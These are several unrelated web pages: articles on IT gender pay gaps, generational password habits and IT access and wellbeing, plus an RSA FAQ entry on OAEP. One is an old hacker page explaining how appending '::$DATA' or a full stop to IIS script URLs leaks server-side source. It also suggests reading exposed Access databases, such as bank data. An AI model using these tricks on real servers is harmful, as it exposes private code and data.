Occupation-wise, male computer programmers make 28.1% more than their female counterparts, a slightly bigger gap than the next two occupations listed: chefs and dentists. The other IT occupation that stands out is information security specialist, where the gap favors males by 14.7%.
There are some occupations where the pay gap favors females. These include social worker, merchandiser and research assistant (in the 6.6% to 7.8% range), but the gaps are nowhere close to some of those that males enjoy.
“To help close the [overall] gender pay gap, we should focus on creating policies and programs that provide women with more access to career development and training, such as pay negotiation skills, to support them through their lives in any job or field they choose to enter,” says Dawn Lyon VP of corporate affairs at Glassdoor, in a statement. Not surprisingly, Glassdoor, which specializes in sharing data about the realities of working at many companies, also advocates for more pay transparency at organizations. | <urn:uuid:ba905c0c-d281-4d31-b987-144e88763eb2> | CC-MAIN-2017-04 | http://www.networkworld.com/article/3047156/careers/male-computer-programmers-shown-to-be-right-up-there-with-chefs-dentists-on-gender-pay-gap-scale.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00411-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965921 | 678 | 3.234375 | 3 |
Last month, I wrote in this blog about research that finds younger generation workers tend to engage in less secure behavior with technology than their older peers.
A Web survey of 1,245 people conducted by ZoneAlarm on the topic of personal computer security found only 31 percent of those aged 18-25 ranked security as the most important consideration when making decisions about their computers. That compared to 58 percent of Baby Boomers (those over age 45).
Another poll, this time conducted by Harris Interactive on behalf of security-products vendor ESET, seems to back that up. The poll of 2,129 U.S. adults aged 18 and over asked if the following statement applied to them:
“When creating any personal password (e.g., online accounts, computer networks, device access codes), I use a combination of numbers, letters and symbols.”
The percentage of respondents who said “yes” was 84 percent. However, the 18-34 age group got the lowest score on this question (77 percent) while the highest scoring demographic was the 55+ age group (89 percent).
From ESET Security Evangelist Stephen Cobb’s blog entry on the poll:
Perhaps the most worrying finding was that fewer students created complex passwords (77 percent) compared with individuals whose work status was full-time/self-employed/retired (each of those groups who scored 86 percent). It is not clear whether this represents an easy-going attitude, a lack of awareness of online threats, or simply “password fatigue” (defined as “tired of having to remember all those different and difficult passwords”).
This pattern of younger people and students exhibiting riskier behavior with respect to online security was underlined by the responses to this statement:
“I use the same password for several of my personal online accounts.”
Some 46 percent of respondents admitted to using the same password for multiple accounts, with the group most likely to do this being those age 18-34 (49 percent). The least likely folks to do this were those 55 or older (43 percent). The largest groups of individuals to use the same password were females 18-34 (56 percent), with females 55+ being the least likely (35 percent).
While it’s clear from this poll, and many others, that security attitudes differ, depending on age, the bigger question is: how do security leaders manage that issue?
One place to start could be to conduct awareness testing and training to find out where the true vulnerabilities lie among staff, and address accordingly.
Lance Spitzer, of SANS Institute Securing the Human Program, recently spoke with CSO about the program’s free metric tools designed to give security leaders the ability to track and measure the impact of their own security awareness programs.
According to Lance Spitzner, training director for the program, the tools can be used to improve training, demonstrate return on investment, or compare an organizations human risk to other organizations in an industry. All resources are free, developed by the community for the community, said Spitzer.
Does your organization have a glaring weak point within certain age groups? How do you know the answer? Leave a comment or email me at firstname.lastname@example.org with your thoughts. | <urn:uuid:605f93e4-5544-4dfb-b86f-34b5309c0130> | CC-MAIN-2017-04 | http://www.csoonline.com/article/2136508/security-leadership/managing-differing-attitudes-about-security.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00227-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95743 | 676 | 2.53125 | 3 |
A global study from BCS, The Chartered Institute for IT, shows that access to information technology has a 'statistically significant, positive impact on life satisfaction'.
Additionally, the report showed women, those on low incomes or with few educational qualifications benefit most from access to IT. Not only do women gain more than men from access to, and use of, technology, they also achieve greater increased life satisfaction from using it. For disadvantaged women without access, therefore, the impact of digital exclusion could be the hardest.
Research involved a number of different elements brought together for the first time in this report. The first phase of research involved the analysis of large global social research data sets to establish whether there was a link between IT access and usage and life satisfaction.
This global analysis was followed up by in-depth research into how IT access and usage influences life satisfaction in the UK. The research in the UK included a unique analysis of data from the British Household Panel Survey plus original primary qualitative and quantitative research programmes.
Elizabeth Sparrow, President, BCS The Chartered Institute for IT said: "Too often, conventional wisdom assumes IT has a negative impact on life satisfaction, but the research has found the opposite to be true. IT has a direct positive impact on life satisfaction, even when controlling for income and other factors known to be important in determining well-being."
I would recommend this report, available from the BCS website http://www.bcs.org/server.php?show=ConWebDoc.35476 .
I have two issues with the report:
- It does not consider the impact of access to IT by people with disabilities.
- The report itself is available as a PDF but it not in a properly accessible format.
To respond to my first issue I will quote two phrases from Executive Summary: "The analysis suggests that IT has an enabling and empowering role leading to a greater sense of freedom and control which in turn leads to greater life satisfaction." and "IT appears to empower the dis-empowered". Given that people with disabilities tend to be dependant on others, anything that can give them more freedom and control over their own lives is likely to lead greater life satisfaction. So access to IT for people with disabilities is likely to have a major impact on their quality of life. Anything that takes that access away can now be seen as a double whammy.
Let us make everyone happier by giving everyone access to IT. | <urn:uuid:cf784c6f-5492-4d5e-82b7-18c7931087d1> | CC-MAIN-2017-04 | http://www.bloorresearch.com/blog/accessibility/the-information-dividend-why-it-makes-you-happier/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00163-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948766 | 497 | 2.703125 | 3 |
If you want to hide code or programs, most will advice you that, given the choice of server side or client side scripting, you should always choose server side, because it hydes your code from prying eyes. Well, this is not always so.
Microsoft IIS has a nice bug: if you enter the name of a script-based page into your browser and put a full stop at the end of the URL, IIS returns the raw ASP page, rather than the script output.
This exploit was published some months ago and Microsoft provided a fix for it (which as you know does not mean anything at all, since the rate of internet bug-fixing is well below 45% :-) and now another new exploit has been found: under certain circumstances you can get hold of any ASP script, or even grab copies of executables sitting on your target server.
The exploit is based on the fact that the native Windows NT file system (NTFS)
supports multiple data streams within a single file. Here the MS 'online'
Multiple Data Streams
NTFS supports multiple data streams. The stream name identifies
a new data attribute on the file. Streams have separate opportunistic
locks, file locks, allocation sizes, and file sizes, but sharing is per file.
The following is an example of an alternate stream:
This feature permits related data to be managed as a single unit.
For example, Macintosh computers use this type of structure to
manage resource and data forks. Or, a company might create a program
to keep a list of changes to the file in an alternate stream, thus
keeping archive information with the current version of the file.
As another example, a library of files might exist where the files
are defined as alternate streams, as in the following example:
Suppose a "smart" compiler creates a file structure like the following example:
Note Because NTFS is not supported on floppy disks, when you copy an NTFS
file to a floppy disk, data streams and other attributes not supported by
FAT are lost.
The really important data stream is called $Data, the stream that stores the actual
content of the file. If you type in the UTL of a script you are interested in,
and you add ::$DATA to the end of it, for example
Obviously this can only happen if the files are being stored on an NTFS volume, so anyone running web server off a FAT volume will not be affected by this exploit, but there are so many exploit out there for FAT volumes, that to get those scripts is as easy as shooting the red cross.
Note that this regards ASP, PL, IDC, SHTML and any other script or executable file types!
Never forget that root is usually
\inetpub\wwwroot in M$ Internet Information Server,
\home\httpd in Apache
and that lazy sysads (or all sysads that have had enough with all bugs) tend to stuff most of the things inside root.
Another interesting example (for instance perusing bank accounts), is that if you find somewhere a 'forgotten' Access database file in some remore subdirectory of your target you just need to point your browser to this file (if you have Access installed on your system) in order to see the whole database. It's read-only, of course, but hey: info is info! | <urn:uuid:22a1e34a-7b0c-46ca-8307-0584222ce401> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/fravia.org/ideale5.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00375-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903792 | 708 | 2.578125 | 3 |
Last week, the U.S. Department of Homeland Security's Science and Technology Directorate began a pilot of an interoperable communications system with the District of Columbia Office of the Chief Technology Officer (OCTO). The Radio Over Wireless Broadband (ROW-B) project will demonstrate how to connect existing wireless radio systems with advanced broadband technologies, such as laptops and smart phones.
In addition to traditional, handheld or vehicle-mounted radios, emergency responders are increasingly using separate, wireless broadband systems to communicate. Wireless broadband services are often supplied by a commercial cellular service provider. Because the radio and broadband systems serve specific and different needs, they were not designed to communicate with each other. The lack of interoperability between these two systems may compromise emergency response operations when responders using a broadband system are unable to communicate with responders using a radio system. That's why the pilot is so important.
"The ROW-B pilot represents an important milestone in our efforts to advance interoperability progress," said Dr. David Boyd, director of the DHS' Science and Technology Directorate's Command, Control and Interoperability Division. "The capability to communicate among radio and broadband system users will significantly improve emergency response operations by allowing non-radio users to communicate with response units in the field."
During July-August 2008, the ROW-B pilot connected OCTO's existing land mobile radio system--wireless radio systems that are either handheld or mounted in vehicles--with broadband devices using the Bridging Systems Interface. This allows a single user to reach multiple users through talk groups on a city-operated 700MHz broadband network. By allowing users to create talk groups in real-time, this technology saves critical response time. ROW-B also will use GIS technology to identify the location of other vehicles, equipment, and responders. GIS databases display these locations on maps that include important information such as roads, buildings, and fire hydrants--enabling emergency responders to access the locations of critical resources, and to form dynamic talk groups based on proximity. | <urn:uuid:595dd09c-5790-4026-ad98-92fc5e55e264> | CC-MAIN-2017-04 | http://www.govtech.com/public-safety/DHS-Pilots-Interoperable-Wireless-Network-with.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00493-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.92389 | 411 | 2.796875 | 3 |
Imperva released a study analyzing 32 million passwords exposed in the Rockyou.com breach. The data provides a unique glimpse into the way that users select passwords and an opportunity to evaluate the true strength of these as a security mechanism.
In the past, password studies have focused mostly on surveys. Never before has there been such a high volume of real-world passwords to examine.
Key findings of the study include:
- The shortness and simplicity of passwords means many users select credentials that will make them susceptible to basic forms of cyber attacks known as “brute force attacks.”
- Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on). The most common password is “123456”.
- Recommendations for users and administrators for choosing strong passwords.
“Everyone needs to understand what the combination of poor passwords means in today’s world of automated cyber attacks: with only minimal effort, a hacker can gain access to one new account every second—or 1000 accounts every 17 minutes,” explained Imperva’s CTO Amichai Shulman.
The report identifies the most commonly used passwords:
For enterprises, password insecurity can have serious consequences. “Employees using the same passwords on Facebook that they use in the workplace bring the possibility of compromising enterprise systems with insecure passwords, especially if they are using easy to crack passwords like “123456′,” said Shulman.
“The problem has changed very little over the past 20 years,” explained Shulman, referring to a 1990 Unix password study that showed a password selection pattern similar to what consumers select today. “It’s time for everyone to take password security seriously; it’s an important first step in data security.
The complete report is available here. | <urn:uuid:b0612cd2-8ac1-49aa-a665-5fa15540a018> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2010/01/21/analysis-of-32-million-breached-passwords/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00245-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.906439 | 392 | 2.859375 | 3 |
One doesn’t normally associate their favorite shampoo or laundry detergent with science, let alone multi-million dollar supercomputers, but in today’s modern world many well-known consumer goods are the products of extensive R&D. By using large-scale computational modeling to facilitate advanced product design, manufacturers can improve customer satisfaction and minimize costly design flaws.
A recent feature article on the Oak Ridge National Laboratory website recounts how the lab’s supercomputing resources enabled Procter & Gamble, the consumer products giant behind such brands as Downy, Head & Shoulders, Olay and Crest, to understand the molecular interactions that control the flow, thickness, performance and stability of P&G products.
Credit: Oak Ridge National Laboratory
Oak Ridge Science Writer Dawn Levy shares how Procter & Gamble and research partners at Temple University leveraged Oak Ridge systems, Jaguar and Titan, to perform challenging molecular dynamics simulations. The research team was specifically working to understand the interplay of fat-soluble molecules called lipids, and lipid vesicles, which are formed from lipid bilayers. Many products for the body and for laundry are comprised of these types of molecules, which directly impact the product’s performance and shelf-life.
“For Procter & Gamble, it is crucial to understand vesicle fusion if you want to extend the shelf lives of such products as fabric softeners, body washes, shampoos, lotions, and the like,” explained Temple’s Michael Klein, a National Academy of Sciences member who has collaborated with P&G for 15 years. “Vesicle fusion is a very hard science problem.”
The addition of perfumes and dyes can also affect stability, making the problem even more complex. Simulating the reorganization of lipid systems over time is thus a very challenging computational problem, surpassing the capabilities of P&G’s in-house machines. To perform these compute-intensive simulations, they turned to what was at the time the fastest supercomputer in the world, Jaguar, which has since been upgraded and re-launched as Titan.
The P&G/Temple University team was awarded time on Jaguar through the Innovative and Novel Computational Impact on Theory and Experiment (INCITE) program, which is jointly managed by the U.S. Department of Energy’s (DOE’s) Leadership Computing Facilities at Argonne and Oak Ridge national laboratories. The researchers accessed 69 million core hours on Jaguar over two years, enabling them to perform simulations of large, complex systems of lipid assemblies.
Because of Jaguar’s powerful capabilities, and also the GPU-equipped Titan prototype, called TitanDev, the team was able to carry out vesicle fusion simulations that had previously not been possible. As Levy concludes, the research highlights the importance of leadership computing facilities for solving “unsolvable” problems and providing a major competitive advantage. | <urn:uuid:72a83ad5-7ac1-406f-a00e-ab62ff573f40> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/08/27/product-design-gets-supercomputing-treatment/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00156-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935498 | 609 | 2.9375 | 3 |
Should Kids Have Cell Phones? How Young is “Too Young?”
I know a man with three kids, all older than his brother’s kids. I overheard him saying with a touch of disdain, “I can’t believe Dacota doesn’t even have a smartphone.” Dacota was 11. All of his kids had smartphones well before age 11.
Dacota’s father probably doesn’t want his daughter exposed to cyberbullying or online stalking, but on the other hand – a smartphone could be a lifesaver for her if she were to ever be abducted. Parents often ask me, “should kids have cell phones?” There are definitely advantages and disadvantages to giving your children cell phones – especially at a young age.
Advantages of Banning Smartphones For Kids
- A cell phone shouldn’t be a babysitter. It forces the old-fashioned way of communicating face-to-face and encourages family participation.
- Forces non-anonymous communication. No strangers, less dangers.
- Eliminates being tricked by an online predator into meeting that predator.
- Eliminates cyberbullying and questionable online behavior that’s more easily done anonymously.
- Frees parents from worrying that their child will download an inappropriate app.
- Prevents kids from video-chatting with strangers and sharing explicit images.
- Parents won’t worry about electronic communication stunting social development leading to addiction.
Advantages of Allowing Kids to Have Smartphones
- Can be a godsend to socially awkward, shy kids who do poor with face-to-face interaction, always worrying about their impression, their body language, if their smile looks forced or laugh sounds fake.
- The child who lacks the nerve to assert himself in person can do so online—without coming off as a bully. This may even prime them for developing more assertive skills in person.
- A child in danger can press a button and instantly summon help, whether they’ve been abducted, are lost, or injured.
- Parents can monitor the child in realtime.
- Parents can instantly connect with the child instead of wondering where they are.
- Allows kids to keep up with technology.
Social Skills Development
This is a big issue. But don’t we all know that before the invention of smartphones, many children were already struggling with these issues? And conversely, many kids who have a mobile device at their hip have excellent face-to-face social skills.
Practice with in-person communication doesn’t always make perfect. A geeky awkward child can practice speaking before several people in person a thousand times and still not be very good at it. It’s like being pricked with a needle: the thousandth prick hurts just as much as the first prick.
Should Kids Have Cell Phones? Sure, With a Few Important Restrictions.
- A compromise is in order. Kids as young as 11 may benefit from a smartphone simply because it will allow their parents to track their location. The child can also summon for help if in danger.
- Consider filtering software to prevent access to inappropriate sites.
- Get a feature phone (a “dumb phone”) that allows for direct communications without the worry of accessing the internet.
- Rules should be enforced, such as no cell phones at the dinner table, and the downloading of apps should be approved by the parents.
- Parents should have passwords to their child’s accounts—or there will be no accounts!
- Kids should be encouraged to report bullying or suspicious online behavior.
Frankly, I think it’s a bit risky to give a kid full blown access to the internet under the age of 16. You wouldn’t give them the keys to the car if they weren’t safe, and the internet is no different. There are plenty of sites that are just a click away that can damage their young minds. As parents, we control the information flow. If they’ve seen something they shouldn’t have, it’s because we allowed it or, at the very least, didn’t do enough to prevent it.
Latest posts by Robert Siciliano (see all)
- Increase Email Security and Reduce Your Risk of Being Hacked - January 17, 2017
- Technology and Kids: How to Manage Your Child’s Tech Time - January 10, 2017
- Privacy Tip: Remove EXIF Data From Photos - January 3, 2017
- January 2017
- December 2016
- November 2016
- October 2016
- September 2016
- August 2016
- July 2016
- June 2016
- May 2016
- April 2016
- March 2016
- February 2016
- January 2016
- December 2015
- November 2015
- October 2015
- September 2015
- August 2015
- July 2015
- June 2015
- May 2015
- April 2015
- March 2015
- February 2015
- January 2015
- December 2014
- November 2014
- October 2014
- September 2014
- August 2014
- July 2014
- June 2014
- May 2014
- April 2014
- March 2014
- February 2014
- January 2014
- December 2013
- November 2013
- October 2013
- September 2013
- August 2013 | <urn:uuid:503a39e4-d3d8-4946-a6fc-8a510ce23a4e> | CC-MAIN-2017-04 | https://www.identityforce.com/blog/should-kids-have-cell-phones | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00366-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954393 | 1,120 | 2.5625 | 3 |
WhiteHat Security recently released the results of a rather interesting study. Normally, studies of Web application security involves which type of vulnerability is most common or most dangerous to a web site. This study, however, looked into which programming language is the most secure among the many used to create Web based applications.
As any frequent visitor to the various Internet forums knows, these results are sure to spark a plethora of flame wars among developers and security experts who stand up to defend their language of choice while at the same time finding flaws in another’s preference. These debates are healthy in the fact that they do expose vulnerabilities in the various languages, however many of the facts are based on heresay and insinuations. By taking emotion out of the debate, this report is able to take an outside look at which language presents the most risk. To gauge the results more accurately, the report also ignored attack surface and looked at the number of vulnerabilities found in a Web application written in a particular language rather than how many vulnerable applications were found in a particular language across the sample.
The results were measured in many different ways, yet two separate categories garner the most interest. The first one we will look at determined the average number of serious vulnerabilities found in application’s lifetime determines by the specific language in which it was written. The following ranks them in order:
Additionally, the length of time it took to fix a vulnerability found in a specific language is of interest. The report dissects these results by specific vulnerabilities but by looking at two of the most common, and most dangerous threats, SQL Injection and Cross-Site Scripting, you can see a rather frightening pattern. These are ranked in order from highest to lowest in the number of days a fix took to patch an XSS vulnerability:
With so many cyber criminals using automated tools to find and attack vulnerable web sites, these numbers are simply unacceptable. While fingers can be pointed at developers, management, executives, etc. the fact remains that tools need to be deployed to protect Web applications against these threats. Code reviews are great and they are the best way to find the source of a vulnerability so that it can be fixed for good, however the data shows that it cannot be the only route an organization takes to secure their web sites or they are as good as compromised. Without tools like Web Application Firewalls to stop attacks before the vulnerabilities can be fixed Web applications will continue to be sitting ducks. | <urn:uuid:0c876fd3-8ba8-42d9-9ff3-f8cdf209bd4c> | CC-MAIN-2017-04 | http://www.applicure.com/blog/study-determines-most-vulnerable-programming-lanuages | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00000-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963309 | 493 | 2.90625 | 3 |
Researchers at the California Institute of Technology have developed a laser that could quadruple internet speeds on the existing internet backbone.
In an interview with the Washington Post, Amnon Yariv, one of the developers and a former winner of the National Medal of Science, said the quadrupling of bandwidth is just the beginning for the technology.
"Our first run lasers, fabricated at Caltech, are capable of of a 4x increase in the number of bytes-per-second carried by each channel," Yariv said in an email interview with the Washington Post. "This number will increase with our continuing work, but even at this level, the economic advantages are very big."
According to the Post, the laser operates closer to a single frequency than any other laser created before, enabling it to increase the amount of data it can carry through fiber optic cables.
Yariv put this in context by saying an internet backbone channel running at 40 Gbps today would increase to 160 Gbps by using their laser. The Post’s Brian Fung extrapolated that to the 400 Gbps speeds touted during Cisco’s unveiling of its CRS-X core routers last year, projecting 1,600 Gbps speeds attainable with Caltech's breakthrough, or "164,000 times faster than the 10 Mbps connection serving the average American home today."
A very helpful section of the Caltech researchers' findings published in the Proceedings of the National Academy of Sciences explains how they were able to work around an obstacle to higher bandwidth on fiber-optic networks.
"The data rate of modern optical fiber communication channels is increasingly constrained by the noise inherent in its principal light source: the semiconductor laser (SCL). Here, we examine the phase noise of SCLs due to the spontaneous recombination of excited carriers radiating into the lasing mode as mandated by quantum mechanics. By incorporating a very high-Q optical resonator as an integral part of a hybrid Si/III-V laser cavity, we can remove most of the modal energy from the optically lossy III-V active region, thereby reducing the spontaneous emission rate while increasing the number of phase-stabilizing stored photons."
As many will be quick to point out, this isn't likely to have a real-world impact on individual internet users any time soon. More broadly, however, this is the exact kind of breakthrough we'll need as the Internet of Things bring us closer to the 50 billion connected-device milestone that Cisco has projected for 2020. | <urn:uuid:7af87150-f7f0-4abb-a99e-284680551bcf> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2226560/opensource-subnet/laser-makes-internet-backbone-speeds-four-times-faster.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00210-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941194 | 511 | 3 | 3 |
Security “leaks” and breaches on popular services are becoming so common it’s almost comical. Except that if your account gets hacked, it could have dire consequences for your privacy and even financial security. Whether it’s a simple social network like Twitter (where 250,000 users’ details have been leaked) or your email account that gets hacked, here’s what you need to do to get control back and protect yourself going forward.
1. Find out if your account has been hacked. Sometimes it’s obvious when your account has been compromised. On Twitter, the hacker might post in your name. For your email account, all of the sudden family and friends are telling you you’ve been spamming them like some Nigerian scammer. Even worse, you might find fraudulent charges on your credit card if one of your online shopping accounts gets compromised.
If you’re not sure or you want to keep tabs on any possible leaks associated with your email address, sites like Pwned List and Should I Change My Password will check your email address against publicized databases of compromised accounts. Both will alert you, if you create an account, in the event your email winds up on any new compromises.
2. Try to regain control of your account immediately. First, scan your computer for malware to make sure your PC is clean. Then try to change the password on the account; you might get lucky. If you’re able to get in, also change the account security question. Because security questions are very basic and also easily guessable, however, it’s best to fib a bit on those answers. E.g., if asked your favorite sports team, answer with your favorite quote.
Change your password to one that’s as long as possible, with mixed case letters, numbers, and symbols. A passphrase is easier to remember than random alphanumeric characters, but the most important factor is length and that you don’t use the same password everywhere (more on that it a bit).
If you can’t get back into your account, contact the security team for the service right away. If your email has been hacked, set up a new email address that you can use for secure communications only (and a separate new email address for stuff like newsletters).
3. Change your password for every site you’ve used the same password. Using the same password for multiple accounts is convenient but it leaves you vulnerable. If you’ve used the same password as the compromised account anywhere else, change it to a unique one right away.
A password manager like KeePass and LastPass makes it easier to create truly unique passwords for each site and service. Alternatively, you could create a master passphrase and tweak it slightly for each service; so, for example, you can use ThisIsMyPassword-forWebMail and ThisIsMyPasword-forGoofingOffonFacebook.
4. Notify friends and family of possible security issues. Often hackers will use your account to attach malware or send phishing emails to your contacts (e.g., “Dear Mom and Dad, I’m stranded in a foreign country and got robbed. Please send money.”) If your email has been hacked, warn your contacts not to click on any links from that account.
5. Set up credit monitoring. If the hacked account has any financial information (credit card or bank account, for example) tied to it, keep a close eye on your statements. Often, companies whose user databases have been hacked will offer customers free credit monitoring. If not, sites like Credit Karma and Credit Sesame can monitor your credit profile, so you’ll know if someone tries to open a new account in your name.
6. Revoke access to third-party applications. A hacker could possibly link your account to malicious third-party apps without your knowledge, so even if you regain control over your account, the hacker could still continue stealing your information. Take the time to review your permissions for these connected apps and remove any unknown or suspicious ones. MyPermissions is a useful landing page for seeing what apps have permissions on a variety of services, including Facebook, Twitter, Google, and Dropbox.
7. Protect your account. If two-factor authentication is an option, make sure you set that up on your account as soon as possible. Two-factor authentication is the best protection we have right now; it requires additional verification when anyone tries to log into your account from a new device. You should also sign up for alerts in Google, your bank accounts, and wherever possible for any suspicious activity in your account.
Photo by IntelFreePress Read more of Melanie Pinola’s Tech IT Out blog and follow the latest IT news at ITworld. Follow Melanie on Twitter at @melaniepinola. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook. | <urn:uuid:0d1d1300-59c2-4830-ae7b-b4e9d14ac318> | CC-MAIN-2017-04 | http://www.itworld.com/article/2712055/consumerization/what-to-do-when-you-ve-been-hacked.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00512-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.911984 | 1,026 | 2.546875 | 3 |
A Rootkit is a program that attempts to hide itself, other files, or computer data so that they cannot be seen on the computer. Rootkits were first created for the Unix operating system where hackers would install a tool set that would replace common operating system files so that the system administrator could not detect their activities. As more advanced techniques were created, rootkits became even more stealthy by installing themselves in such a way that they are able to intercept commands on the operating system so that a user would only be shown what the rootkit wanted the user to see. This includes the ability to make it so files, directories, configuration files, and Windows Registry keys are invisible to a system administrator or user of the machine.
With this said, the success of a rootkit is its ability to remain undetected on a machine. Fortunately, most rootkits are not programmed well and tell-tale signs become apparent leading a user to investigate their machine more closely. With this in mind, anti rootkit programs, or ARKs, were created that allow you to scan your computer for programs that are possibly intercepting instructions on the computer, which is a big sign that a rootkit may be installed. Some of the more popular Windows ARKs are RootRepeal and GMER, which contain a graphical user interface that quickly allows you to scan your computer for potential rootkits. When using these programs, though, you need to make sure you interpret the results properly as false positives are common.
A few years ago, a rootkit was not commonly seen on computers unless purposely planted there by a hacker to hide their activity. As more and more malware is created for the purpose of making money through cyber crime, the criminals need a more advanced way to protect their interests. In many cases, these methods are the use of rootkits to hide the money-making malware and make it difficult for traditional anti-malware and anti-virus program to remove them. Some rootkits are used to generate money on their own by acting as Trojan installers and advertisement engines.
Though the vast majority of rookits are used for criminal purposes, rootkits have been used for what may be considered more legitimate reasons. For example, in 2005 Sony Music decided to use rootkit technology as part of their Digital Rights Management protection. Unfortunately, they did not publicly disclose this technology and when it was discovered that rootkit technology, that could easily have been abused, was in use, security professionals and users were quick to speak out strongly against it. Today rootkit technology is used within legitimate programs such as Alcohol 120% and Daemon tools in order to hide themselves from being seen by anti-piracy programs. Some anti-virus programs also use aspects of rootkit technology in order to protect your computers from viruses.
As you can see, rootkits are a powerful technique that unfortunately are being used more and more by malware to protect themselves. As we analyze new malware that comes out we find that it is now common to find rootkits bundled along with them. Therefore, it is important to be aware of how these files work and that you can discover them using the free ARK scanners described above.
For more information about rootkits, please see the links below. | <urn:uuid:04954ed3-b03e-44fd-9611-1812be9f8157> | CC-MAIN-2017-04 | https://www.bleepingcomputer.com/virus-removal/threat/rootkits/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00266-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966659 | 665 | 3.046875 | 3 |
Equal parts fascinating and confounding, the field of quantum computing keeps making headway. Two exciting developments are described in the current issue of Nature, one from a collaboration between Harvard University and MIT researchers and the other from the Max Planck Institute of Quantum Optics in Germany. Their work concerns the fundamental building blocks that make quantum computing possible.
As summarized in Popular Mechanics, the scientists figured out a way to combine atoms and particles of light – photons – to create a quantum versions of the switch and logic-gate – two essential elements of classic computing systems.
Quantum computing has long been considered the holy grail of computing. This bizzare world of particle superposition and spooky action at a distance promises to unlock the door to unprecedented kinds of computing tasks. Beyond the killer app of encryption, all sorts of seemingly uncanny things become possible, such as simulations of the universe itself.
At their core, all modern computers involve data and rules. In classical computing, the smallest unit of data is a bit, represented as a 0 or a 1. In quantum computing, the bit becomes a q-bit and instead of just being able to represent two states, it can exist in multiple states. “Superposition,” as this phenomenon is called, allows a lot of information to be acted on in a very small space, setting the stage for incredibly fast supercomputers.
Superposition states are fragile, though, and must be coaxed into being. “At this point, very small-scale quantum computers already exist,” says Mikhail Lukin, the head of the Harvard research team. “We’re able to link, roughly, up to a dozen qubits together. But a major challenge facing this community is scaling these systems up to include more and more qubits.”
The new quantum logic gate and switch introduce a new method of connecting particles, using trapped rubidium atoms and photons. The Harvard and MIT scientists created the switch by coupling one rubidum atom with a single photon, enabling both the atom and photon to switch the quantum state of the other particle. Being able to go from a ground state to an excited state, the atom-photon coupling can transmit information like a transistor in a classical computing system.
The German research group used mirror-like sheets and lasers to trap the atom, forming quantum gates, which change the direction of motion or polarization of photons. When the rubidium atom is in superposition, the photon both does and does not enter the mirror, and both does and does not get a polarization change. Via an attribute of quantum physics called entanglement swapping, multiple photons can share superposition information. These engtangled photons are made to bounce repeatedly off the mirror-trapped rubidium atom, acting as the input for the logic gate.
“The Harvard/MIT experiment is a masterpiece of quantum nonlinear optics, demonstrating impressively the preponderance of single atoms over many atoms for the control of quantum light fields,” says Gerhard Rempe, a professor at the Max Planck Institute of Quantum Optics who was part of the research team upon reading the paper from his US counterparts. “The coherent manipulation of an atom coupled to a photonic crystal resonator constitutes a breakthrough and complements our own work … with an atom in a dielectric mirror resonator.” | <urn:uuid:d666b7fe-fb21-4638-b415-88ce13dd32dd> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/04/11/research-advances-key-quantum-computing-elements/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00082-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.913107 | 687 | 3.75 | 4 |
7.10 What is OAEP?
Optimal Asymmetric Encryption Padding (OAEP) is a method for encoding messages developed by Mihir Bellare and Phil Rogaway [BR94]. The technique of encoding a message with OAEP and then encrypting it with RSA is provably secure in the random oracle model. Informally, this means that if hash functions are truly random, then an adversary who can recover such a message must be able to break RSA.
An OAEP encoded message consists of a ``masked data'' string concatenated with a ``masked random number''. In the simplest form of OAEP, the masked data is formed by taking the XOR of the plaintext message M and the hash G of a random string r. The masked random number is the XOR of r with the hash H of the masked data. The input to the RSA encryption function is then
[M ÅG(r)] || [r ÅH(M ÅG(r))]
Often, OAEP is used to encode small items such as keys. There are other variations on OAEP (differing only slightly from the above) that include a feature called ``plaintext-awareness''. This means that to construct a valid OAEP encoded message, an adversary must know the original plaintext. To accomplish this, the plaintext message M is first padded (for example, with a string of zeroes) before the masked data is formed. OAEP is supported in the ANSI X9.44, IEEE P1363 and SET standards.
- 7.1 What is probabilistic encryption?
- Contribution Agreements: Draft 1
- Contribution Agreements: Draft 2
- 7.2 What are special signature schemes?
- 7.3 What is a blind signature scheme?
- Contribution Agreements: Draft 3
- Contribution Agreements: Final
